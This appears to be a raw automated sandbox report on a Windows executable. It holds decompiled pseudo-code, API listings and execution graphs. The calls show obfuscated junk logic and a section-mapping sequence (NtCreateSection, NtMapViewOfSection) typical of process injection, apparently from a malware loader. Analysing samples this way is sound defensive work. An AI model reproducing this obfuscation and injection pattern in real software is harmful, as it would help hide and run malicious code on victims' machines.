                      				intOrPtr* _t30;
                      
                      				_t33 = __eflags;
                      				_t25 = __edi;
                      				asm("out 0xdc, al");
                      				_t24 = __eax;
                      				L0040119E(__edx, 0x63, __edi, __eflags);
                      				_t19 =  *((intOrPtr*)(_t28 + 8));
                      				Sleep(0x1388);
                      				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
                      				_t34 = _t13;
                      				if(_t13 != 0) {
                      					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
                      				}
                      				 *_t19(0xffffffff, 0);
                      				_push(0x18a0);
                      				_t15 =  *_t30;
                      				return L0040119E(_t15, 0x63, _t25, _t34);
                      			}

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                      • Opcode Fuzzy Hash: 3ccb135d8cd8dc8608f35812b1b48db498075e36bc90ac32ca3eb8d1277e0039
                      • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 334 40189a-4018bd call 40119e Sleep call 4013d8 340 4018cc-401907 call 40119e 334->340 341 4018bf-4018c7 call 4014a8 334->341 341->340
                      C-Code - Quality: 61%
                      			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr _t13;
                      				intOrPtr* _t17;
                      				signed char _t21;
                      				void* _t25;
                      				intOrPtr* _t27;
                      
                      				_t30 = __eflags;
                      				_t22 = __edi;
                      				_pop(ds);
                      				L0040119E(_t8, __ecx, __edi, __eflags);
                      				_t17 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				_t31 = _t11;
                      				if(_t11 != 0) {
                      					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                      				}
                      				 *_t17(0xffffffff, 0);
                      				_push(0x18a0);
                      				_t13 =  *_t27;
                      				return L0040119E(_t13, 0x63, _t22, _t31);
                      			}

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction ID: fa21e6fe5ec55b494b8a61ead8be6eb3dfa9bfc2d8f44280934193d3a60a32fd
                      • Opcode Fuzzy Hash: 19053c3fc689dbcb7e5f7681520f18359435fcd39de0bfa97560276b7de449ff
                      • Instruction Fuzzy Hash: B3F01D37604205EBDB00BA95DC819AE3769AF04315F20843BBA12B90E1C6398B12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0040A836
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040A847
                      • __getptd.LIBCMT ref: 0040A855
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: MOC$csm
                      • API String ID: 803148776-1389381023
                      • Opcode ID: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction ID: db0c76aa7c4e0e0626e6bed2eef3fec0a3783135ff2f5cf4364eea1cffeb3cee
                      • Opcode Fuzzy Hash: 671699303d6b60e28057f17e5ec861d0093e6d5f61e45ced52332932ffd97aae
                      • Instruction Fuzzy Hash: 6EE012325103048FD710AAA5C4457563394FB54318F6945B6A808D7393C73CEC615687
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __fileno__flsbuf__flush__locking
                      • String ID:
                      • API String ID: 2259706978-0
                      • Opcode ID: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction ID: 7db9d4361589b3ed1bd66184b58abc72e1ff8a651a3b30b1fe564f823639e331
                      • Opcode Fuzzy Hash: 15180966515bcd9a64484e0174daa60dbe67719289ee5ef70f2a1fc3c6d11957
                      • Instruction Fuzzy Hash: D5419031E00604DBDB249FE988C059FB7B6AF80320F24877FE815A66D1D778DE419B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                      • String ID:
                      • API String ID: 1628550938-0
                      • Opcode ID: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction ID: 90b4e4d6a6b9f7267b9c86ff23d96e3d4ca3ffa8321baab54594e45d1f43a617
                      • Opcode Fuzzy Hash: 77557e80ab456e670524621a6396b0ec4f5b533249553a52296d6b2d98cacb2a
                      • Instruction Fuzzy Hash: DF115171540701DFD710AF7A9905B9ABBE0AF04314F10457FE499B62E1CBB89A40CB5D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0040AAFF
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AB0D
                      • __getptd.LIBCMT ref: 0040AB1B
                      • __getptd.LIBCMT ref: 0040AB26
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040ABF3: __getptd.LIBCMT ref: 0040AC10
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID:
                      • API String ID: 803148776-0
                      • Opcode ID: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction ID: 4ceb4badccefb88abe74292121835467509f31c118642c149aaa2b759065458d
                      • Opcode Fuzzy Hash: 5acad694606c70bc299f6e3d03924e6ad357319d4721c8e7a9f3fb00c0938d84
                      • Instruction Fuzzy Hash: 9911DAB1C00309DFDB00EFA5D845ADE7BB1FF04318F10856AF854A7292DB789A519F59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0041035B
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 00410372
                      • __amsg_exit.LIBCMT ref: 00410380
                      • __lock.LIBCMT ref: 00410390
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                      • String ID:
                      • API String ID: 3521780317-0
                      • Opcode ID: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction ID: 078b7b1b4c449bd8eee7397e22a660bfcf81d1e5f576ffd6547d9eee0cff7ad2
                      • Opcode Fuzzy Hash: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction Fuzzy Hash: 17F0FF31A407189BD730FBA6940279E73A0AB04718F50466FAC94A72D2CBBC59C1DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AC10
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: csm
                      • API String ID: 803148776-1018135373
                      • Opcode ID: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction ID: bffc41321c1a3a0fb5d007abf3a1080087ced7d40673d35ab145433e29951c07
                      • Opcode Fuzzy Hash: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction Fuzzy Hash: B90128348043058BEF38DF65D4886AEB3B5AF10315FAA453FE481766D1CB3889A1CB0B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:1.4%
                      Dynamic/Decrypted Code Coverage:31.6%
                      Signature Coverage:15.8%
                      Total number of Nodes:38
                      Total number of Limit Nodes:3
                      execution_graph 22067 4d272d 22069 4d27c2 WriteFile 22067->22069 22097 507020 22098 507024 22097->22098 22099 507027 malloc 22097->22099 22070 4f75ed 22072 4f7613 22070->22072 22074 4c3c75 wcscat 22072->22074 22075 46ce82 22076 46cf1f LoadLibraryA 22075->22076 22077 46cf0a 22075->22077 22077->22076 22078 4afd42 22079 4afdcd CryptGetHashParam 22078->22079 22081 4aff63 22079->22081 22085 4b036b 22081->22085 22086 4ae906 22081->22086 22083 4b01b2 22084 4b0340 CryptDestroyHash 22083->22084 22084->22085 22087 4ae926 22086->22087 22088 4ae937 CharUpperBuffA 22087->22088 22088->22083 22100 23e8026 22101 23e8035 22100->22101 22104 23e87c6 22101->22104 22105 23e87e1 22104->22105 22106 23e87ea CreateToolhelp32Snapshot 22105->22106 22107 23e8806 Module32First 22105->22107 22106->22105 22106->22107 22108 23e803e 22107->22108 22109 23e8815 22107->22109 22111 23e8485 22109->22111 22112 23e84b0 22111->22112 22113 23e84c1 VirtualAlloc 22112->22113 22114 23e84f9 22112->22114 22113->22114 22089 4b0fc1 GetFileAttributesW 22090 4a65e7 22091 4a65f1 VirtualAlloc 22090->22091 22093 46db68 22094 46db86 LoadLibraryA 22093->22094 22096 46dbd6 22094->22096

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 4afd42-4afdcb 1 4afdcd-4afdef 0->1 2 4afdf1-4afe2f 0->2 1->2 3 4afe7e-4afe95 2->3 4 4afe31-4afe40 2->4 5 4afe9c-4afeb7 3->5 6 4afe42-4afe6b 4->6 7 4afe71-4afe76 4->7 9 4afeb9-4afee2 5->9 10 4aff13-4aff29 5->10 6->7 7->5 8 4afe78-4afe7b 7->8 8->3 11 4afef6-4aff11 9->11 12 4afee4-4afef4 9->12 13 4aff2b 10->13 14 4aff31-4aff61 CryptGetHashParam 10->14 11->10 12->11 13->14 15 4aff63 14->15 16 4aff65-4aff8d 14->16 15->16 17 4aff8f-4affaa 16->17 18 4affb3-4affb9 16->18 17->18 19 4affac 17->19 20 4affbb-4affc9 18->20 21 4affce-4affee call 46624a 18->21 19->18 20->21 24 4b0452-4b0475 21->24 25 4afff4-4b0016 21->25 28 4b047a 24->28 26 4b004a-4b006c call 4673bf 25->26 27 4b0018-4b0047 25->27 31 4b006e-4b007b 26->31 32 4b0084-4b0092 26->32 27->26 28->28 33 4b0098-4b009f 31->33 34 4b007d 31->34 32->33 35 4b0118 33->35 36 4b00a1-4b00c3 33->36 34->32 37 4b011e-4b016d 35->37 38 4b00d3-4b0116 36->38 39 4b00c5-4b00cc 36->39 40 4b016f-4b017b 37->40 41 4b0191-4b019c 37->41 38->35 38->37 39->38 42 4b017d-4b018e 40->42 43 4b01a3-4b01ad call 4ae906 40->43 41->43 42->41 45 4b01b2-4b01c3 43->45 46 4b01eb-4b01f3 45->46 47 4b01c5-4b01e7 45->47 48 4b0211-4b0242 46->48 49 4b01f5-4b020f 46->49 47->46 50 4b027b 48->50 51 4b0244-4b026b 48->51 49->48 53 4b0281-4b02cb call 466493 50->53 52 4b026d-4b0274 51->52 51->53 52->50 56 4b02cd-4b02f5 53->56 57 4b0320 53->57 58 4b032a-4b0332 56->58 59 4b02f7-4b02fc 56->59 60 4b0327 57->60 63 4b0334-4b033d 58->63 61 4b030b-4b0313 59->61 62 4b02fe-4b0309 59->62 60->58 64 4b0340-4b0369 CryptDestroyHash 61->64 65 4b0315-4b0317 61->65 62->61 63->64 67 4b036b-4b0370 64->67 68 4b03b5-4b040d 64->68 65->63 66 4b0319-4b031e 65->66 66->57 66->60 71 4b037c-4b03af 67->71 72 4b0372-4b037a 67->72 69 4b040f-4b041f 68->69 70 4b0426-4b0451 68->70 69->70 70->24 71->68 72->71
                      C-Code - Quality: 20%
                      			E004AFD42(intOrPtr __ecx, void* __edx, signed int __edi, void* __esi) {
                      				signed int _t111;
                      				signed int _t117;
                      				signed int _t122;
                      				signed int _t124;
                      				signed int _t129;
                      				signed int _t133;
                      				signed int _t138;
                      				signed int _t141;
                      				signed int _t145;
                      				signed int _t147;
                      				signed int _t150;
                      				signed int _t152;
                      				signed int _t153;
                      				unsigned int _t162;
                      				signed int _t165;
                      				signed int _t174;
                      				unsigned short _t191;
                      				char* _t199;
                      				unsigned short _t204;
                      				signed int _t210;
                      				char* _t227;
                      				intOrPtr _t245;
                      				signed int _t247;
                      				void* _t248;
                      				intOrPtr _t274;
                      				short _t280;
                      				void* _t288;
                      				short _t291;
                      				signed int _t296;
                      				signed int _t297;
                      				void* _t304;
                      				signed short _t305;
                      				signed int _t306;
                      				void* _t324;
                      				signed int _t325;
                      				void* _t327;
                      				void* _t329;
                      				void* _t333;
                      				signed int _t335;
                      				signed int _t337;
                      				void* _t345;
                      
                      				_t111 =  *(_t345 - 8);
                      				_push( *((intOrPtr*)(_t345 - 0x70)));
                      				_t296 = __edx - __esi;
                      				_t333 = __esi - 0xb5e3a7;
                      				 *0x50bf14 = _t111;
                      				_t324 = (__edi ^ 0x00cb1a6d) - 1;
                      				 *0x50bf07 = _t111;
                      				 *(_t345 - 8) = _t111;
                      				 *(_t345 - 0x14) = 0x296659;
                      				 *(_t345 - 8) = _t111;
                      				 *((intOrPtr*)(_t345 - 0x1c)) = 0x3f8cff;
                      				 *((intOrPtr*)(_t345 - 0x20)) = __ecx;
                      				 *0x50919a = 0x762a;
                      				_push( *((intOrPtr*)(_t345 - 0x68)));
                      				_t272 = 0xec54;
                      				_t117 =  *(_t345 - 8);
                      				if(0x3f8cff <= 0x3362) {
                      					_t272 =  *0x509172; // 0x87
                      					 *0x5091c0 = _t296;
                      					_t296 = 0;
                      				}
                      				 *0x50bf13 = _t117;
                      				_t335 = _t333 + 0x0000b189 & 0x00ad5e5d;
                      				_t191 =  *0x50bf14; // 0x0
                      				_push(2);
                      				_t325 = _t324 + 0xf1a7;
                      				 *(_t345 - 8) = _t117;
                      				 *(_t345 - 0x18) = _t191 >> _t272;
                      				_t122 =  *(_t345 - 8);
                      				if(_t122 >= 0x26bf) {
                      					L7:
                      					_t272 = 0x66de;
                      					 *((intOrPtr*)(_t345 - 0x28)) =  *((intOrPtr*)(_t345 - 0x28)) + 0x66de;
                      					_t296 =  *0x50919a; // 0xc472
                      					goto L8;
                      				} else {
                      					if(_t272 > _t272) {
                      						_t272 = _t272 + 0x6f;
                      						 *0x509196 = _t272;
                      						_t296 = 0x9d04;
                      						_t335 = _t335 + _t335;
                      						 *0x50bf15 = _t122;
                      						_t325 = (_t325 & 0x00d38946) - 0xda9b88;
                      					}
                      					if(_t122 >= 0x767a4) {
                      						L8:
                      						 *0x50a80c =  *0x50a80c - _t296;
                      						 *0x50bf11 =  *0x50bf11 - _t296;
                      						_push( *((intOrPtr*)(_t345 - 0x60)));
                      						 *0x50962e =  *0x50962e + _t325;
                      						 *(_t345 - 8) = _t122;
                      						if(_t122 != 0x1a) {
                      							 *(_t345 - 0x18) =  *(_t345 - 0x18) - "mscpxl32.dLL";
                      							_t272 = _t272 - 0x57103b;
                      							 *0x50916e = _t272;
                      							 *0x509184 = _t272;
                      							if((_t296 & 0x007a6b86) <= 0) {
                      								 *0x509208 = 0x9061;
                      								_t296 = _t335;
                      							}
                      							_t325 = _t325 - 0xd658e3;
                      							_t122 = 0x1f6e09;
                      						}
                      						_t199 = "HMETAFILEPICT_UserSize";
                      						 *0x50913e = _t272;
                      						if(_t272 > _t272) {
                      							_t272 = _t272 + 0x6d36e1;
                      						}
                      						 *0x5091d8 = _t296;
                      						_t297 =  *0x50920c; // 0xe35a
                      						 *0x50bf12 =  *0x50bf12 - _t122;
                      						 *0x50bf13 =  *0x50bf13 + _t122;
                      						_t124 =  *0x509cb0();
                      						_t337 = _t335 + 0xbaffb9;
                      						if(_t124 <= 0) {
                      							_t325 = 0;
                      						}
                      						 *(_t345 - 8) = _t124;
                      						 *(_t345 - 0x14) = _t199;
                      						_t129 =  *(_t345 - 8);
                      						if(_t129 <= 0x2e) {
                      							 *0x5090fc =  *0x5090fc - 0x3e86af;
                      							_t272 = 0x6540;
                      							if(0x6540 == 0x6540) {
                      								 *0x509194 =  *0x509194 - 0x6540;
                      							}
                      						}
                      						if((_t297 & 0x007718c1) >= 0) {
                      							_t297 = _t297 + 0x948f - 1;
                      							 *0x50bf12 = _t129;
                      							_t337 = _t337 - 0xcbc0;
                      						}
                      						 *(_t345 - 8) = _t129;
                      						E0046624A(_t129, _t272, _t297, _t325, _t337, _t129);
                      						_t133 =  *(_t345 - 8);
                      						_t204 =  *(_t345 - 0x10) >> _t272;
                      						if(_t133 == 0) {
                      							 *0x50bf13 = _t133;
                      							 *(_t345 - 8) = _t133;
                      							_push(_t204 + 1);
                      							_push(E004B047C);
                      							goto __ebx;
                      						} else {
                      							_t327 = 0xffffffffff313c87;
                      							 *0x50bf07 = _t133;
                      							 *(_t345 - 8) = _t133;
                      							_t138 =  *(_t345 - 8);
                      							_t207 = "_isdel.exe";
                      							if("_isdel.exe" < 0x3421a7) {
                      								 *0x509124 =  *0x509124 - 0x49586e;
                      								 *((intOrPtr*)(_t345 - 0x24)) =  *((intOrPtr*)(_t345 - 0x24)) - _t272;
                      								_t272 = 0x7933;
                      								_t297 = 0xffffffffffffffff;
                      								 *0x50bf13 = _t138;
                      								_t337 = 0;
                      								_t207 = 0x495793;
                      							}
                      							 *(_t345 - 8) = _t138;
                      							_push("wuapi.dll");
                      							_push(0);
                      							_push(1);
                      							E004673BF(_t207);
                      							_t141 =  *(_t345 - 8);
                      							if("NtPowerInformation" > "NtPowerInformation") {
                      								L27:
                      								_t297 = 0x99c8;
                      								 *0x50aacc =  *0x50aacc + 0x99c8;
                      								goto L28;
                      							} else {
                      								_t291 =  *0x509140; // 0x7264
                      								if(_t291 > _t291) {
                      									L28:
                      									_t210 = _t141;
                      									_push( *((intOrPtr*)(_t345 - 0x64)));
                      									if(_t327 < 0) {
                      										L32:
                      										 *0x50bf0b =  *0x50bf0b - _t210;
                      										L33:
                      										 *(_t345 - 0x18) = _t210;
                      										_t274 =  *0x509114; // 0x7c68
                      										 *0x50bf0e =  *0x50bf0e - _t274;
                      										 *0x50bf0f =  *0x50bf0f + _t274;
                      										_t276 = 0x8543;
                      										 *0x50bf11 =  *0x50bf11 + 0x8d26;
                      										_push( *((intOrPtr*)(_t345 - 0x68)));
                      										_t304 = 0xadbb;
                      										 *(_t345 - 8) = _t141;
                      										if(_t141 <= 0x166597) {
                      											L36:
                      											_t304 = 0x8f3d;
                      											 *0x5091ea =  *0x5091ea - 0x8f3d;
                      											 *0x509206 =  *0x509206 - 0x8f3d;
                      											L37:
                      											_t305 = _t304 + _t304;
                      											_t145 = E004AE906(); // executed
                      											 *0x50bf13 = 0xca;
                      											 *(_t345 - 8) = _t145;
                      											if( !_t145 < 0x2b) {
                      												_t276 = _t276 - 0x6b;
                      												 *0x509170 =  *0x509170 + _t276;
                      												 *((intOrPtr*)(_t345 - 0x2c)) =  *((intOrPtr*)(_t345 - 0x2c)) + _t276;
                      												_t305 = 0x9936;
                      											}
                      											_t147 =  *(_t345 - 8);
                      											if(_t147 <= 0xb10b0) {
                      												 *(_t345 - 0x14) =  *(_t345 - 0x14) - 0x204777;
                      												 *(_t345 - 0x18) = 0x204777;
                      												_t276 =  !_t276;
                      											}
                      											 *(_t345 - 8) = _t147;
                      											 *(_t345 - 0x10) = 0x1a2514;
                      											_t150 =  *(_t345 - 8);
                      											 *(_t345 - 0x6c) = _t150;
                      											 *(_t345 - 8) = _t150;
                      											_t152 =  *(_t345 - 8);
                      											 *(_t345 - 8) = _t152;
                      											if(_t152 >= 0x15e26f) {
                      												L44:
                      												_t153 =  *0x50bf13; // -9
                      												goto L45;
                      											} else {
                      												_t153 = 0x2b1935;
                      												 *((intOrPtr*)(_t345 - 0x1c)) = 0xf41967;
                      												_t288 = _t276 + 0x5f5c;
                      												 *0x50bf0e =  *0x50bf0e + _t288;
                      												_t276 = _t288 + _t288;
                      												if((_t276 & 0x00000081) >= 0) {
                      													L45:
                      													 *0x50bf14 =  *0x50bf14 + _t153;
                      													_t329 = _t327 + _t327 + 0xcdbd29;
                      													_push( *((intOrPtr*)(_t345 - 0x60)));
                      													E00466493( *(_t345 - 8) +  *(_t345 - 8), 0x340b36, _t276, _t329, 0x14ca10,  *(_t345 - 8) +  *(_t345 - 8), 0);
                      													_t162 =  *(_t345 - 8);
                      													if(0x340b36 <= 0x34fb15) {
                      														L52:
                      														 *0x50905c =  *0x50905c - _t162;
                      														L53:
                      														 *(_t345 - 0x10) = _t162;
                      														L54:
                      														L55:
                      														_t280 = 0xea;
                      														L56:
                      														 *0x5091a8 = _t280;
                      														_t306 = _t305 ^ 0x00008af6;
                      														 *(_t345 - 8) =  *0x509d1c();
                      														_t165 =  *(_t345 - 8);
                      														 *(_t345 - 8) = _t165;
                      														if(_t165 > 0x17d4) {
                      															if( *(_t345 - 0x10) > 0x30) {
                      																 *((intOrPtr*)(_t345 - 0x1c)) =  *((intOrPtr*)(_t345 - 0x1c)) - 0x38ba92;
                      															}
                      															_t306 = _t306 + 0x785ee6 - 0x98;
                      															 *0x50921c = _t306;
                      															_t174 =  *0x50bf13; // -9
                      															 *0x50bf14 = _t174;
                      															 *0x50bf14 = _t174;
                      															_t165 = _t174 - _t174;
                      														}
                      														 *0x50bf07 = _t165;
                      														_push(0);
                      														_t227 =  *(_t345 - 0x14);
                      														 *0x50bf0b =  *0x50bf0b - _t227;
                      														 *0x5090ea =  *0x5090ea + _t227;
                      														_push( *((intOrPtr*)(_t345 - 0x5c)));
                      														 *0x50bf09 =  *0x50bf09 - 0x191ec3;
                      														if( &(_t227[_t227]) == 0x2bc7) {
                      															 *((intOrPtr*)(_t345 - 0x20)) =  *((intOrPtr*)(_t345 - 0x20)) - 0x438c51;
                      														}
                      														 *0x50bf10 =  *0x50bf10 + _t306;
                      														_push(0x4b0452);
                      														_push( *0x509c28);
                      														return  *(_t345 - 8);
                      													}
                      													 *0x50915a = _t276;
                      													_t280 = 0x84;
                      													 *0x5091be =  *0x5091be + _t305;
                      													 *0x5091d8 = _t305;
                      													if((_t305 & 0x000099af) > 0) {
                      														goto L54;
                      													}
                      													if((_t305 & 0x0000a974) <= 0) {
                      														 *0x50bf13 = _t162;
                      													}
                      													_t329 = _t329 - 0xe0a5;
                      													if(_t329 < 0) {
                      														goto L56;
                      													} else {
                      														if(_t329 >= 0) {
                      															goto L55;
                      														}
                      														if(_t162 >= 0xd) {
                      															goto L53;
                      														}
                      														goto L52;
                      													}
                      												}
                      												_t305 =  *0x5091b2; // 0x23e0
                      												 *0x50921e = _t305;
                      												goto L44;
                      											}
                      										}
                      										_t141 =  *(_t345 - 0x10);
                      										_t245 = _t210 - 0x32aea0;
                      										if(_t245 == _t245) {
                      											goto L37;
                      										}
                      										 *((intOrPtr*)(_t345 - 0x1c)) = _t245;
                      										_t276 = 0x8573;
                      										 *0x509182 = 0x8543;
                      										goto L36;
                      									}
                      									_t247 =  *0x50bf07; // 0x0
                      									_t248 = _t247 - 0x1395f9;
                      									 *0x50905e =  *0x50905e + _t141;
                      									 *0x509078 =  *0x509078 + _t141;
                      									if(_t248 > 0x36f145) {
                      										 *((intOrPtr*)(_t345 - 0x20)) = _t248 + 1;
                      									}
                      									 *0x5091ac = _t297;
                      									 *0x50bf12 =  *0x50bf12 - 0x9bdf;
                      									_t337 = (_t337 & 0x0000b386) - 0xaf27aa;
                      									 *0x50ba8f =  *0x50ba8f - _t327;
                      									 *0x50bf15 = _t141;
                      									_t327 = 0;
                      									 *0x509014 =  *0x509014;
                      									 *(_t345 - 8) = _t141;
                      									_t210 = _t141;
                      									if(_t141 < 0x27) {
                      										goto L33;
                      									} else {
                      										goto L32;
                      									}
                      								}
                      								 *0x50918a = _t291;
                      								goto L27;
                      							}
                      						}
                      					} else {
                      						 *(_t345 - 8) = _t122;
                      						goto L7;
                      					}
                      				}
                      			}












































                      0x004b027b
                      0x00000000
                      0x004b0244
                      0x004b0247
                      0x004b0252
                      0x004b025a
                      0x004b025f
                      0x004b0265
                      0x004b026b
                      0x004b0281
                      0x004b0287
                      0x004b0290
                      0x004b029c
                      0x004b02b9
                      0x004b02c2
                      0x004b02cb
                      0x004b0320
                      0x004b0320
                      0x004b0327
                      0x004b0327
                      0x004b032a
                      0x004b0334
                      0x004b033d
                      0x004b0340
                      0x004b0340
                      0x004b0347
                      0x004b0353
                      0x004b035b
                      0x004b0362
                      0x004b0369
                      0x004b0370
                      0x004b0377
                      0x004b0377
                      0x004b038f
                      0x004b0392
                      0x004b039c
                      0x004b03a2
                      0x004b03a8
                      0x004b03ad
                      0x004b03af
                      0x004b03b5
                      0x004b03d8
                      0x004b03d9
                      0x004b03dc
                      0x004b03e2
                      0x004b03f7
                      0x004b0402
                      0x004b040d
                      0x004b041a
                      0x004b041f
                      0x004b042d
                      0x004b0446
                      0x004b044b
                      0x004b0451
                      0x004b0451
                      0x004b02d5
                      0x004b02df
                      0x004b02e2
                      0x004b02e9
                      0x004b02f5
                      0x00000000
                      0x00000000
                      0x004b02fc
                      0x004b0301
                      0x004b0309
                      0x004b030b
                      0x004b0313
                      0x00000000
                      0x004b0315
                      0x004b0317
                      0x00000000
                      0x00000000
                      0x004b031e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004b031e
                      0x004b0313
                      0x004b026d
                      0x004b0274
                      0x00000000
                      0x004b0274
                      0x004b0242
                      0x004b016f
                      0x004b0172
                      0x004b017b
                      0x00000000
                      0x00000000
                      0x004b017d
                      0x004b0184
                      0x004b0187
                      0x00000000
                      0x004b0187
                      0x004b00a1
                      0x004b00a7
                      0x004b00ad
                      0x004b00b4
                      0x004b00c3
                      0x004b00c6
                      0x004b00cc
                      0x004b00d3
                      0x004b00e3
                      0x004b00ef
                      0x004b00f7
                      0x004b00fd
                      0x004b0102
                      0x004b0108
                      0x004b010f
                      0x004b0112
                      0x004b0116
                      0x00000000
